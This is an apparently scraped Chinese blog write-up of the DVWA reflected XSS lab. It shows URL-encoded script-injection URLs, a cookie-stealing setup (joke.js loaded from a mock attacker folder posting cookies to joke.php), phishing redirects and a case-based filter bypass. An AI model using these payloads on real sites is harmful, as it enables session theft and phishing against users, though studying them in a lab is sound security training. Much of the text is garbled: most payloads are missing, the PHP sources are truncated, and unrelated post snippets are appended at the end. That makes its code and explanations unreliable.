DVWA實驗XSS反射型(弱方法)

2021-08-17 08:16:43 字數 2387 閱讀 6725

1.先判斷有誤xss漏洞

輸入值得注意的是輸入 沒有反應

顯示如下

惡意url為:http://localhost/dvwa/vulnerabilities/xss_r/?name=%3cscript%3ealert%28%2fxss%2f%29%3c%2fscript%3e#

獲取cookie

首先在www檔案下建立乙個名為joke的資料夾(模擬攻擊者伺服器)

joke.php的作用是把joke變數儲存的cookie儲存到伺服器中

在輸入,使得伺服器呼叫joke.js指令碼

joke.js再呼叫joke.php

惡意:http://localhost/dvwa/vulnerabilities/xss_r/?name=%3cscript+src%3dhttp%3a%2f%2flocalhost%2fjoke%2fjoke.js%3e%3c%2fscript%3e#

在伺服器中找到了乙個記錄著cookie的檔案

重定向**

惡意url localhost/dvwa/vulnerabilities/xss_r/?name=

會重定向到乙個釣魚**。

原始碼分析:

reflected xss source

<?php

header ("x-xss-protection: 0");

// is there any input?

if( array_key_exists( "name", $_get ) && $_get[ 'name' ] != null )

?>

直接把使用者的輸入賦值給了name沒有做任何的過濾

輸入已經失效了

但當輸入卻成功了,意味著沒有對大小寫進行過濾

輸入便可能到cookie

惡意url:

原始碼分析

reflected xss source

<?php

header ("x-xss-protection: 0");

// is there any input?

if( array_key_exists( "name", $_get ) && $_get[ 'name' ] != null )

";

}?>

preg_replace 函式執行乙個正規表示式的搜尋和替換

mixed preg_replace 

(mixed $pattern

,mixed $replacement

,mixed $subject

[,int

$limit =-

1[,int&

$count

]])

搜尋 subject 中匹配 pattern 的部分, 以 replacement 進行替換。

引數說明:

$name = preg_replace( '/
/i表示不區分大小寫,且從/開始匹配,只要匹配到 script中的任乙個字元都將自動替換為空格

就算是輸入了自己的思路是把最普通的xss**

在當前頁面彈出cookie

外部呼叫攻擊**ls.js

跳轉某頁面

當使用了黑名單過濾標籤時,使用以下

框架

DVWA之XSS(反射型)

伺服器 low array key exists key,array 函式檢查某個陣列中是否存在指定的鍵名,如果鍵名存在則返回 true,如果鍵名不存在則返回 false。可以看出 只是判斷name是否存在是否為空,並沒有任何的過濾。漏洞利用 伺服器端 medium str replace find...

DVWA實驗儲存型XSS

直接輸入測試,只要檢視這個日誌就會彈出這個資訊,依法炮製試試獲取cookie 輸入,發現並未能獲取到任何資料,經過檢視發現message裡面有字數限制,則只需要進行抓包修改即可。因為是做實驗可以,把檔名什麼的修改的短一點能輸入就能獲取。那麼接下來嘗試視窗的跳轉 輸入即可跳轉 實驗證明少了http 或...

DVWA 反射型XSS 全級別

1.low級別 header x xss protection 0 is there any input?if array key exists name get get name null 分析 沒有過濾 解 alert 123 script 2.medium級別 header x xss pro...